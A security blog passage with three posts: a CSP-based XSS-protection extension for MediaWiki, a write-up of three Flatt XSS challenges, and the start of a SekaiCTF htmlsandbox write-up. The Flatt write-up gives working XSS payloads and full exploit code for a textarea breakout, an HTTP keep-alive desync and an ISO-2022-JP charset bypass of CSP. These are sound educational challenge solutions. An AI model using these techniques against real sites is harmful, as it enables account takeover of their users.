Showing posts with label infosec. Show all posts

Wednesday, July 30, 2025

Preventing XSS in MediaWiki - A new extension to protect your Wiki

It's no secret that the vast majority of serious security vulnerabilities in MediaWiki are Cross-Site-Scripting (XSS).

XSS is where an attacker can put evil javascript where they aren't supposed to in order to take over other users. For example, the typical attack would look like the attacker putting some javascript in a wiki page. The javascript would contain some instructions for the web browser, like make a specific edit. Then anyone who views the page would make the edit. Essentially it lets evil people take over other users' accounts. This is obviously quite problematic in a wiki environment.

This is the year 2025. We shouldn't have to deal with this anymore. Back in Y2K the advice was that "Web Users Should Not Engage in Promiscuous Browsing". A quarter of a century later, we have a better solution: Content-Security-Policy.

Everyone's favourite security technology: CSP

Content Security Policy (CSP) is a major web browser security technology designed to tackle this problem. It's actually a grab-bag of a lot of things, which sometimes makes it difficult to talk about, as it's not one solution but a bunch of potential solutions to a bunch of different problems. Thus when people bring it up in conversation they can often talk past each other if they are talking about different parts of CSP.
 
First and foremost though CSP is designed to tackle XSS.
 
The traditional wisdom with CSP is that it's easy if you start with it, but difficult to apply it afterwards in an effective way. Effective being the operative word. Since CSP has so many options and knobs, it is very easy to apply a CSP policy that does nothing but looks like it's doing something.

This isn't the first time I've tried MediaWiki and CSP. Back when I used to work for the Wikimedia Foundation in 2020, I was tasked with trying to make something work with CSP. Unfortunately it never really got finished. After I left, nobody developed it further and it was never deployed. *sads*

Part of the reason is I think the effort tried to do too much all at once. From Wikimedia's perspective there are two big issues that they might want to solve: XSS and "privacy". XSS is very traditional, but privacy is somewhat unique to Wikimedia. Wikimedia sites allow users and admins to customize javascript. This is about as terrible an idea as it sounds, but here we are. There are various soft-norms around what people can do. Generally it's expected that you are not allowed to send any data (even implicitly such as someone's IP address by loading an off-site resource) without their permission. CSP has the potential to enforce this, but it's a more complex project than just the XSS piece. In theory the previous attempt was going to try and address both, which in retrospect was probably too much scope all at once relative to the resources dedicated to the project. In any case, after I left my job the project died.

Can we go simpler?

Recently I've been kind of curious about the idea of CSP but simple. What is the absolute minimal viable product for CSP in MediaWiki?

For starters this is just going to focus on XSS. Outside of Wikimedia, the privacy piece is not cared about very much. I don't know, maybe Miraheze care (not sure), but I doubt anyone else does. In most MediaWiki installs there is a much closer connection between the "interface-admin" group and the people running the servers, thus there is less need to restrict what the interface-admin group can do. In any case, I don't work for WMF anymore, and I'm not interested in dealing with all the political wrangling that would be needed to make something happen in the Wikimedia world. However, Wikimedia is not the only user of MediaWiki and perhaps there is still something useful we could easily do here.

The main insight is that the body of article and i18n messages generally should not contain javascript at all, but that is where most XSS attacks will occur. So if we can use CSP to disable all forms of javascript except <script> tags, and then use a post processing filter to filter all script tags out of the body of the article, we should be golden. At the same time, this should involve almost no changes to MediaWiki.

This is definitely not the recommended way of using CSP. It's entirely possible I'm missing something here and there is a way to bypass it. That said, I think this will work.

What exactly are we doing

So I made an Extension - XSSProtector. Here is what it does:

  • Set CSP script-src-attr 'none'.
    • This disables html attributes like onclick or onfocus. Code following MediaWiki conventions should never use these, but they are very common in attacks where you can bypass attribute sanitization. It is also very common in javascript based attacks, since the .innerHTML JS API ignores <script> tags but processes the on attributes.
  • Look for <script tag in content added for output (i.e. in OutputPage) and replace it with &lt;script tag. MediaWiki code following coding conventions should always use ResourceLoader or at least OutputPage::addHeadItem to add scripts, so only evil stuff should match. If it is in an attribute, there should be no harm in replacing it with an entity.
  • Ditto for <meta and <base tags. Kind of a side point, but you can use <meta http-equiv="refresh" ... to redirect the page. <base can be used to adjust where resources are loaded from, and sometimes to pass data via the target attribute. We also use base-uri CSP directive to restrict this.
  • Add an additional CSP tag after page load - script-src-elem *. This disables unsafe-inline after page load. MediaWiki uses dynamic inline script tags during initial load for "legacy" scripts. I don't think it needs that after page load (though I'm honestly not sure). The primary reason to do this is to disable javascript: URIs, which would otherwise be a major method to bypass this system.
  • We also try to regex out links with javascript URIs, but the regex is sketchy and I don't have the same confidence in it that I do with the regex for <script.
  • Restrict form-action targets to 'self' to reduce risk of scriptless XSS that tricks users with forms.
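
To make the list above a bit more concrete, here is a minimal Python sketch of the tag filter and the initial policy. It is only an illustration, not the extension's actual code (the extension itself runs inside MediaWiki). The function names, the exact regex and the 'self' value for base-uri are assumptions made for the example.

```python
import re

# Assumed pattern: a "<" that starts a script, meta or base tag, in any letter case.
TAG_START = re.compile(r"<(?=script|meta|base)", re.IGNORECASE)


def neutralize_tags(html: str) -> str:
    """Replace the "<" of <script, <meta and <base with the &lt; entity."""
    return TAG_START.sub("&lt;", html)


def initial_csp() -> str:
    """Build a policy from the directives described in the list.

    The 'self' value for base-uri is an assumption; the post only says
    that the base-uri directive is used.
    """
    directives = [
        "script-src-attr 'none'",  # no onclick=, onfocus=, ...
        "base-uri 'self'",         # assumed value
        "form-action 'self'",
    ]
    return "; ".join(directives)


print(neutralize_tags("<p>hi</p><ScRiPt>alert(1)</script>"))
print(initial_csp())
```

Closing tags are left alone on purpose: once the opening tag is turned into text, a stray </script> has nothing to close.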

The main thing this misses is <style> tags. Attackers could potentially add them to extract data from a page, either by unclosed markup loading a resource that contains the rest of the page in the url or via attacks that use attribute selectors in CSS (so-called "scriptless xss"). It also could allow the attacker to make the page display weird in an attempt to trick the user. This would be pretty hard to block, especially if the TemplateStyles extension is enabled, and the risk is relatively low as there is not much you can do with it. In any case, I decided not to care.

The way the extension hooks into the Message class is very hacky. If this turns out to be a good idea, probably the extension would need to become part of core or new hooks would have to be added to Message.

Does it work?

Seems to. Of course, the mere fact I can't hack the thing I myself came up with isn't exactly the greatest brag. Nonetheless I think it works and I haven't been able to think of any bypasses. It also seems to not break anything in my initial testing.

 Extension support is a little less clear. I think it will work for most extensions that do normal things. Some extensions probably do things that won't work. In most cases they could be fixed by following MediaWiki coding conventions. In some cases, they are intrinsically problematic, such as Extension:Widgets.

To be very clear, this hasn't been exhaustively tested, so YMMV.

How many vulns will it stop?

Let's take a look at recent vulnerabilities in MediaWiki core. In the MediaWiki 1.39 release series, between 1.39.0 and 1.39.13, there were 29 security vulnerabilities.

17 of these vulnerabilities were not XSS. Note that many of these are very low severity, to the point it's debatable if they even are security vulnerabilities. If I was triaging the non-XSS vulnerabilities, I would say there are 6 informational (informational is code for: I don't think this is a security vulnerability but other people disagree), 9 low severity, 2 medium-low severity. None of them come close to the severity of an (unauthenticated) XSS, although some may be on par with an XSS vuln that requires admin rights to exploit.

While I haven't explicitly tested all of them, I believe the remaining 12 would be blocked by this extension. Additionally, if we are just counting by number, this is a bit of an under count, as in many cases multiple issues are being counted as a single phab ticket, if reported at the same time.

In conclusion, this extension would have stopped 41% of the security vulnerabilities found so far in the 1.39.x release series of MediaWiki, including all of the high severity ones. That's pretty good in my opinion.
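
For anyone who wants to check the arithmetic, here is the same count as a tiny Python snippet. The numbers are the ones given above; the variable names are just for illustration.

```python
total = 29
non_xss = {"informational": 6, "low": 9, "medium-low": 2}

xss = total - sum(non_xss.values())  # everything that is not in the non-XSS buckets
share = xss / total

print(f"{xss} of {total} = {share:.1%}")
```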

Try it yourself

You can download the extension from here. I'd be very curious if you find that the extension breaks anything or otherwise causes unusual behaviour. I'd also love for people to test it to see if they can bypass any of its protections.

It should support MediaWiki 1.39 and above, but please use the REL1_XX branch for the version of MediaWiki you have (e.g. on 1.39 use the REL1_39 branch) as the master branch is not compatible with older MediaWiki.

Sunday, December 1, 2024

Writeup for the flatt XSS challenge

This November, the company Flatt put out three XSS challenges - https://challenge-xss.quiz.flatt.training/ ( source code at https://github.com/flatt-jp/flatt-xss-challenges )

These were quite challenging and I had a good time solving them. The code for all of my solutions is at http://bawolff.net/flatt-xss-challenge.htm. Here is how I solved them.

Challenge 1 (hamayan)

This was, in my opinion, the easiest challenge.

The setup is as follows - We can submit a message. On the server side we have:

  const sanitized = DOMPurify.sanitize(message);
  res.view("/index.ejs", { sanitized: sanitized });

with the following template:

    <p class="message"><%- sanitized %></b></p>
    <form method="get" action="">
        <textarea name="message"><%- sanitized %></textarea>
        <p>
            <input type="submit" value="View 👀" formaction="/" />
        </p>
    </form>

As you can see, the message is sanitized and then used in two places - in normal HTML but also inside a <textarea>.

The <textarea> tag is not a normal HTML tag. It has a "text" content model. This means that HTML inside it is not interpreted and the normal HTML rules don't apply.

Consider the following HTML as our message: <div title="</textarea><img src=x onerror=alert(origin)>">

In a normal html context, this is fairly innocuous. It is a div with a title attribute. The title attribute looks like html, but it is just a title attribute.

However, if we put it inside a <textarea>, it gets interpreted totally differently. There are no elements inside a textarea, so there are no attributes. The </textarea> thus closes the textarea tag instead of being a harmless attribute:

<textarea><div title="</textarea><img src=x onerror=alert(origin)>">

Thus, once the textarea tag gets closed, the <img> tag is free to execute.
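
The difference can be sketched with a toy model in Python. This is not a real HTML parser, just a hand-rolled illustration of the one rule that matters here: inside a textarea the browser only looks for the end tag. The function name is made up for the example.

```python
def split_at_textarea_end(markup: str) -> tuple[str, str]:
    """Toy model of how a browser reads <textarea> content.

    Inside a textarea the only thing that matters is the first
    "</textarea" end tag; quotes and other tags are plain text.
    Returns (textarea text, markup parsed as normal HTML afterwards).
    """
    lower = markup.lower()
    start = lower.index("<textarea>") + len("<textarea>")
    end = lower.index("</textarea", start)
    after = markup.index(">", end) + 1
    return markup[start:end], markup[after:]


message = '<div title="</textarea><img src=x onerror=alert(origin)>">'
text, rest = split_at_textarea_end(f"<textarea>{message}</textarea>")
print(repr(text))  # what ends up as the textarea's text
print(repr(rest))  # what the browser goes on to parse as ordinary HTML
```

The second value starts with the <img> tag, which is now outside the textarea and parsed like any other element.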

https://challenge-hamayan.quiz.flatt.training/?message=%3Cdiv%20title=%22%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(origin)%3E%22%3E

Challenge 2 (Ryotak)

This challenge was probably the hardest for me.

The client-side setup

We have a website. You can enter some HTML and save it. Once saved, you are given an id number in the url, the HTML is fetched from the server, it is sanitized and then set to the innerHTML of a div.

The client-side sanitization is as follows:

        const SANITIZER_CONFIG = {
            DANGEROUS_TAGS: [
                'script',
                'iframe',
                'style',
                'object',
                'embed',
                'meta',
                'link',
                'base',
                'frame',
                'frameset',
                'svg',
                'math',
                'template',
            ],

            ALLOW_ATTRIBUTES: false
        }

        function sanitizeHtml(html) {
            const doc = new DOMParser().parseFromString(html, "text/html");
            const nodeIterator = doc.createNodeIterator(doc, NodeFilter.SHOW_ELEMENT);

            while (nodeIterator.nextNode()) {
                const currentNode = nodeIterator.referenceNode;
                if (typeof currentNode.nodeName !== "string" || !(currentNode.attributes instanceof NamedNodeMap) || typeof currentNode.remove !== "function" || typeof currentNode.removeAttribute !== "function") {
                    console.warn("DOM Clobbering detected!");
                    return "";
                }
                if (SANITIZER_CONFIG.DANGEROUS_TAGS.includes(currentNode.nodeName.toLowerCase())) {
                    currentNode.remove();
                } else if (!SANITIZER_CONFIG.ALLOW_ATTRIBUTES && currentNode.attributes) {
                    for (const attribute of currentNode.attributes) {
                        currentNode.removeAttribute(attribute.name);
                    }
                }
            }

            return doc.body.innerHTML;
        }

If that wasn't bad enough, there is also server-side sanitization, which I'll get to in a bit.

Client side bypass

This looks pretty bad. It disallows all attributes. It disallows <script> which you more or less need to do anything interesting if you don't have event attributes. It disallows <math> and <svg> which most mXSS attacks rely on.

However there is a mistake:

        for (const attribute of currentNode.attributes) {
              currentNode.removeAttribute(attribute.name);
        }

Which should be:

        for (const attribute of Array.from(currentNode.attributes)) {
              currentNode.removeAttribute(attribute.name);
        } 

The attributes property is a NamedNodeMap. This is a live class that is connected to the DOM. This means that if you remove the first attribute, it is instantly deleted from this list, with the second attribute becoming the first, and so on.

This is problematic if you modify the attributes while iterating through them in a loop. If you remove an attribute in the first iteration, the second attribute then becomes the first. The next iteration then goes to the current second attribute (previously the third). As a result, what was originally the second attribute gets skipped.

In essence, the code only removes odd attributes. Thus <video/x/onloadstart=alert(origin)><source> will have only the x removed, and continue to trigger the XSS.

For reasons that will be explained later, it is important that our exploit does not have any whitespace in it. An alternative exploit might be <img/x/src/y/onerror=alert(origin)>
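
The same skipping behaviour can be reproduced in Python, since removing items from a list while iterating over it has the same effect. This is only an analogy for the live NamedNodeMap, not DOM code, and the function names are made up for the example.

```python
def buggy_strip(attributes: list[str]) -> list[str]:
    """Remove items while iterating the same list, like the challenge code."""
    for name in attributes:
        attributes.remove(name)
    return attributes


def fixed_strip(attributes: list[str]) -> list[str]:
    """Iterate over a snapshot, like Array.from(currentNode.attributes)."""
    for name in list(attributes):
        attributes.remove(name)
    return attributes


# <video/x/onloadstart=...> has the attributes x and onloadstart.
print(buggy_strip(["x", "onloadstart"]))
# <img/x/src/y/onerror=...> has the attributes x, src, y and onerror.
print(buggy_strip(["x", "src", "y", "onerror"]))
print(fixed_strip(["x", "src", "y", "onerror"]))
```

In both buggy cases the junk attributes are removed and the interesting ones survive, which is exactly why the payloads put a throwaway attribute in front of each one that matters.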

The server-side part

That's all well and good, but the really tricky part of this challenge is the server side part.

        elif path == "/api/drafts":
            draft_id = query.get('id', [''])[0]
            if draft_id in drafts:
                escaped = html.escape(drafts[draft_id])
                self.send_response(200)
                self.send_data(self.content_type_text, bytes(escaped, 'utf-8'))
            else:
                self.send_response(200)
                self.send_data(self.content_type_text, b'')
        else:
            self.send_response(404)
            self.send_data(self.content_type_text, bytes('Path %s not found' % self.path, 'utf-8'))

As you can see, the server side component HTML-escapes its input.

This looks pretty impossible. How can you have XSS without < or >?

My first thought was maybe something to do with charset shenanigans. However this turned out to be impossible since everything is explicitly labelled UTF-8 and the injected HTML is injected via innerHTML so takes the current document's charset.

I also noticed that we could put arbitrary text into the 404 error page. The error page is served as text/plain, so it would not normally be exploitable. However, the JS that loads the html snippet uses fetch() without checking the returned content type. I thought perhaps there would be some way to make it fetch the wrong page and use the 404 result as the html snippet.

My next thought was maybe there is a difference in path handling between python urllib and the WHATWG URL spec. There are in fact lots of differences, but none that seemed exploitable. There was also no way to inject a <base> tag or anything like that. Last of all, the fetch url starts with a /, so it's always going to be relative just to the host and not the current path.

I was stuck here for quite a long time.

Eventually I looked at the rest of the script. There are some odd things about it. First of all, it is using python's BaseHTTPRequestHandler as the HTTP server. The docs for that say in giant letters: "Warning: http.server is not recommended for production. It only implements basic security checks.". Sounds promising.

I also couldn't help but notice that this challenge was unique compared to the others - it was the only one hosted on an IP address with just plain HTTP/1.1 and no TLS. The other two were under the .quiz.flatt.training domain, HTTP/2 and presumably behind some sort of load balancer.

All signs pointed to something being up with the HTTP implementation.

Poking around the BaseHTTPRequestHandler, I found the following in a code comment: "IT IS IMPORTANT TO ADHERE TO THE PROTOCOL FOR WRITING!". All caps, must be important.

Let's take another look at the challenge script. Here is the POST handler:

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length'))
        if content_length > 100:
            self.send_response(413)
            self.send_data(self.content_type_text, b'Post is too large')
            return
        body = self.rfile.read(content_length)
        draft_id = str(uuid4())
        drafts[draft_id] = body.decode('utf-8')
        self.send_response(200)
        self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))

    def send_data(self, content_type, body):
        self.send_header('Content-Type', content_type)
        self.send_header('Connection', 'keep-alive')
        self.send_header('Content-Length', len(body))
        self.end_headers()
        self.wfile.write(body)


Admittedly, it took me several days to see this, but there is an HTTP protocol violation here.

The BaseHTTPRequestHandler class supports HTTP Keep-alive. This means that connections can be reused after the request is finished. This improves performance by not having to repeat a bunch of handshake steps for every request. The way this works is if the web server is willing to keep listening for more requests on a connection, it will set the Connection: Keep-Alive header. The challenge script always does this.

The problem happens during the case where a POST request has too large a body. The challenge script will return a 413 error if the POST request is too large. This is all fine and good. 413 is the correct error for such a situation. However it immediately returns after this, not reading the POST body at all, leaving it still in the connection buffer. Since the Connection: Keep-alive header is set, the python HTTP server class thinks the connection can be reused, and waits for more data. Since there is still data left in the connection buffer, it gets that data immediately, incorrectly assuming it is the start of a new request. (This type of issue is often called "client-side desync")

What the challenge script should do here is read Content-Length number of bytes and discard them, removing them from the connection buffer, before handing the connection off to the base class to wait for the next request. Alternatively, it could set the Connection: Close header, to signal that the connection can no longer be reused (This wouldn't be enough in and of itself, but the python base class looks for this). By responding without looking at the POST body, the challenge script desynchronizes the HTTP connection. The server thinks it is waiting on the next request, but the web browser is still in the middle of sending the current request.

To summarize, this means that if we send a large POST request, the web server will treat it as two separate requests instead of a single request.
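
Here is a toy Python model of what happens to the bytes on the connection. It is a deliberately simplified sketch, not the real http.server code: the parser, the function name, the drain_body flag, the Host value and the padding length are all assumptions made for illustration. Only the 100 byte limit and the /api/drafts path come from the challenge script.

```python
def handle_requests(buffer: bytes, drain_body: bool) -> list[str]:
    """Return the request lines a keep-alive server would see on one connection."""
    seen = []
    while buffer:
        head, sep, rest = buffer.partition(b"\r\n\r\n")
        if not sep:
            break  # headers not finished yet; a real server would wait for more data
        lines = head.split(b"\r\n")
        seen.append(lines[0].decode("latin-1"))
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        if length > 100 and not drain_body:
            # The bug: answer 413 and return without reading the body,
            # so the body stays in the buffer and is parsed as a new request.
            buffer = rest
        else:
            buffer = rest[length:]
    return seen


smuggled = (b"GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\n"
            b"host:f\r\n"
            b"x-junk1: " + b"a" * 100 + b"=aa\r\n")
post = (b"POST / HTTP/1.1\r\nHost: challenge\r\n"
        b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n\r\n" + smuggled)
browser_next = b"GET /api/drafts?id=1 HTTP/1.1\r\nHost: challenge\r\n\r\n"

print(handle_requests(post + browser_next, drain_body=False))
print(handle_requests(post + browser_next, drain_body=True))
```

With drain_body=False the second request line the server sees is the one hidden in the POST body, and the browser's real request is swallowed as junk headers. With drain_body=True the body is consumed and the browser's own request is handled normally.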

We can use this to poison the connection. We send something that will be treated as two requests. When the browser sends its next request, the web server responds with part two of our first request, thus causing the web browser to think the answer to its second request is the answer to part two of the first request.

The steps of our attack would be as follows:

  • Open a window to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63 (The specific draft_id doesn't matter as long as it's consistent). This will ensure that the page is in cache, as we don't want it to be fetched in the middle of our attack. Note that this page is sent with a Cache-Control: max-age=3600 header, while most other requests do not have this header.
  • Make a long POST request that has a POST body that looks something like GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\nhost:f\r\nx-junk1: PADDING.. (This is why our payload cannot have whitespace, it would break the HTTP request line which is whitespace delimited)
  • Navigate to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63. Because we preloaded this and it is cacheable, it should already be in cache. The web browser will load it from disk not the network. The javascript on this page will fetch the document with that draft_id in the url via fetch(). This response does not have a caching header, so the web browser makes a new request on the network. Since half of the previous POST is still in the connection buffer, the webserver responds to that request instead of the one the browser just made. The result is a 404 page containing our payload. The web browser sees that response, and incorrectly assumes it is for the request it just made via fetch(). It is sent with a text/plain content type and 404 status code but the javascript does not care.

The only tricky part left is how to send a POST with such fine-grained control over the body.

HTML forms have a little-known feature where they can be set to send in text/plain mode. This works perfectly for us. Thus we have a form like:

<form method="POST" target="ryotak" enctype="text/plain" action="http://34.171.202.118/" id="ryotakform">
<input type="hidden"
name="GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1&#xd;&#xa;host:f&#xd;&#xa;x-junk1: aaaaaaaaaaaaaaaaaaaaaa..." value="aa">
</form>
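
To see why this gives such fine-grained control, here is a small Python sketch of the text/plain form encoding, where each field is sent as name=value followed by CRLF with no escaping. The function name is made up, and the padding length of 100 is an assumption standing in for the elided padding in the form above.

```python
def encode_text_plain(fields: list[tuple[str, str]]) -> bytes:
    """Serialize form fields the way enctype="text/plain" does: name=value CRLF."""
    return "".join(f"{name}={value}\r\n" for name, value in fields).encode("utf-8")


# The field *name* carries the smuggled request; the padding length is assumed.
field_name = ("GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\n"
              "host:f\r\n"
              "x-junk1: " + "a" * 100)
body = encode_text_plain([(field_name, "aa")])

print(body.split(b"\r\n")[0].decode())  # first line of the POST body
print(len(body) > 100)                  # long enough to trigger the 413 path
```

The "=aa" that the encoding appends ends up harmlessly at the end of the junk header value.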

 The rest of the exploit looks like:

    window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
    setTimeout( function () {
        document.getElementById( 'ryotakform' ).submit();
        setTimeout( function () {
            window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
        }, 500 );
    }, 5000 );

 The timeouts are to ensure that the web browser had enough time to load the page before going to the next step.

You can try it out at http://bawolff.net/flatt-xss-challenge.htm

Challenge 3 (kinugawa)

Note: My solution works on Chrome but not Firefox.

The Setup 

  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy"
    content="default-src 'none';script-src 'sha256-EojffqsgrDqc3mLbzy899xGTZN4StqzlstcSYu24doI=' cdnjs.cloudflare.com; style-src 'unsafe-inline'; frame-src blob:">

<iframe name="iframe" style="width: 80%;height:200px"></iframe>

[...]

      const sanitizedHtml = DOMPurify.sanitize(html, { ALLOWED_ATTR: [], ALLOW_ARIA_ATTR: false, ALLOW_DATA_ATTR: false });
      const blob = new Blob([sanitizedHtml], { "type": "text/html" });
      const blobURL = URL.createObjectURL(blob);
      input.value = sanitizedHtml;
      window.open(blobURL, "iframe");
 

We are given a page which takes some HTML, puts it through DOMPurify, turns it into a blob url then navigates an iframe to that blob.

Additionally there is a CSP policy limiting which scripts we can run.

The solution

The CSP policy is the easiest part. cdnjs.cloudflare.com is on the allow list which contains many js packages which are unsafe to use with CSP. We can use libraries like angular to bypass this restriction.

For the rest - we're obviously not going to find a 0-day in DOMPurify. If I did, I certainly would have led the blog post with that.

However, since blob urls are separate documents, that means that they are parsed as a fresh HTML document. This includes charset detection (Since the mime type of the Blob is set to just text/html not text/html; charset=UTF-8). DOMPurify on the other hand is going to assume that the input byte stream does not need any character set related conversions.

So in principle, what we need to do here is create a polyglot document. A document that is safe without any charset conversions applied, but becomes dangerous when interpreted under a non-standard character set. Additionally we then need to get the blob url interpreted as that character set.

There are a small number of character sets interpreted by web browsers. There used to be quite a lot of dangerous ones to choose from such as UTF-7 or hz. However most of these got removed and the only remaining charset that is easy to make dangerous is ISO-2022-JP.

The reason that ISO-2022-JP is so useful in exploits is that it is modal. It is actually 4 character sets in one, with a special code to change between them. If you write "^[$B" it switches to Japanese mode. "^[(B" on the other hand switches to ASCII mode. (^[ refers to ASCII character 0x1B, the escape character. You might also see it written as \x1B, %1B, ESC or \e). If we are already in the mode that the escape sequence switches to, then the character sequence does nothing and it is removed from the byte stream.

This means that <^[(B/style> will close a style tag when the document is in ISO-2022-JP mode, but is considered nonsense in UTF-8 mode.

Thus we might have a payload that looks like the following: (Remembering that ^[ stands for ascii ESC):

<style> <^[(B/style>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><^[(B/script>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'>
  <^[(B/script>
  <^[(Bdiv ng-app ng-csp>
    {{$on.curry.call().alert($on.curry.call().origin)}}
  <^[(B/div>
</style>

DOMPurify won't see <^[(B/style> as a closing style tag and thinks the whole thing is the body of the style tag. To prevent mXSS, DOMPurify won't allow things that look like html tags (a "<" followed by a letter) inside <style> tags, so those are also broken up with ^[(B. A browser interpreting this as ISO-2022-JP would simply not see the "^[(B" sequences and treat it as normal HTML.
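
The effect of the escape sequence can be checked with Python's built-in codecs. This is only a sketch of the idea: Python's iso2022_jp decoder is not guaranteed to match a browser's decoder in every detail, but it does show the no-op escape sequence disappearing.

```python
ESC = b"\x1b"

# "<style> <ESC(B/style>": the escape sequence sits between "<" and "/style>".
fragment = b"<style> <" + ESC + b"(B/style>"

as_utf8 = fragment.decode("utf-8")
as_iso2022jp = fragment.decode("iso2022_jp")

# In UTF-8 the ESC byte is just a control character, so there is no closing tag.
print("</style>" in as_utf8)
# In ISO-2022-JP the sequence only selects ASCII mode and produces no output.
print("</style>" in as_iso2022jp)
```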

Now all we need to do is to convince the web browser that this page should be considered ISO-2022-JP.

The easiest way of doing that would be with a <meta charset="ISO-2022-JP"> tag. Unfortunately DOMPurify does not allow meta tags through. Even if it did, this challenge configures DOMPurify to ban all attributes. (We can't use the ^[(B trick here, because it only works after the document is already in ISO-2022-JP mode).

Normally we could use detection heuristics. In most browsers, if a document does not have a charset in its content type nor a meta tag, the web browser just makes a guess based on its textual content of the beginning of the document. If the browser sees a bunch of ^[ characters used in a way that would be valid in ISO-2022-JP and no characters that would be invalid in that encoding (such as multibyte UTF-8 characters), it knows that this document is likely ISO-2022-JP, so guesses that as the charset of the document.

However this detection method is used as a method of last resort. In the case of an iframe document (which does not have a better method such as charset in the mime type or meta tag), the browser will use the parent window's charset, instead of guessing based on document contents.

Since this parent document uses UTF-8, this stops us.

However, what if we didn't use an iframe?

The challenge navigates the iframe by using its name. What if there was another window with the same name? Could we get that window to be navigated instead of the iframe?

If we use window.open() to open the challenge in a window named "iframe", then the challenge would navigate itself instead of the iframe. The blob is now a top-level navigation, so cannot take its charset from the parent window. Instead the browser has no choice but to look at the document contents as a heuristic, which we can control.

The end result is something along the lines of:

window.open( 'https://challenge-kinugawa.quiz.flatt.training/?html=' +
   encodeURIComponent( "<div>Some random Japanese text to trigger the heuristic: \x1b$B%D%t%#%C%+%&$NM5J!$J2HDm$K@8$^$l!\"%i%$%W%D%#%RBg3X$NK!2J$K?J$`$b!\"%T%\"%K%9%H$r$a$6$7$F%U%j!<%I%j%R!&%t%#!<%/$K;U;v$9$k!#$7$+$7!\";X$N8N>c$K$h$j%T%\"%K%9%H$rCGG0!\":n6J2H$H$J$k!#%t%#!<%/$NL<$G%T%\"%K%9%H$N%/%i%i$H$NNx0&$H7k:'$O%7%e!<%^%s$NAO:n3hF0$KB?Bg$J1F6A$r5Z$\$7$?!#\x1b(Bend <style><\x1b(B/style><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><\x1b(B/script><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'><\x1b(B/script><\x1b(Bdiv ng-app ng-csp>{{$on.curry.call().alert($on.curry.call().origin)}}<\x1b(B/div></style>begin\x1b$B%sE*8e\x1b(Bend</div>" ),
"iframe" );

Try it at http://bawolff.net/flatt-xss-challenge.htm

Conclusion

These were some great challenges. The last two especially took me a long time to solve.

Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

This is all evaluated at save time by converting the html to a data: url, passing it to puppeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If it's in the <body>, it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

Turns out, the answer is no. Per the HTML5 spec, if you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other than a comment (and DTDs/PIs) before the <head>.

I also thought about DOM clobbering, but it seemed pretty impossible given that document.querySelector() and === were used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if I redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect to, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

It's a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

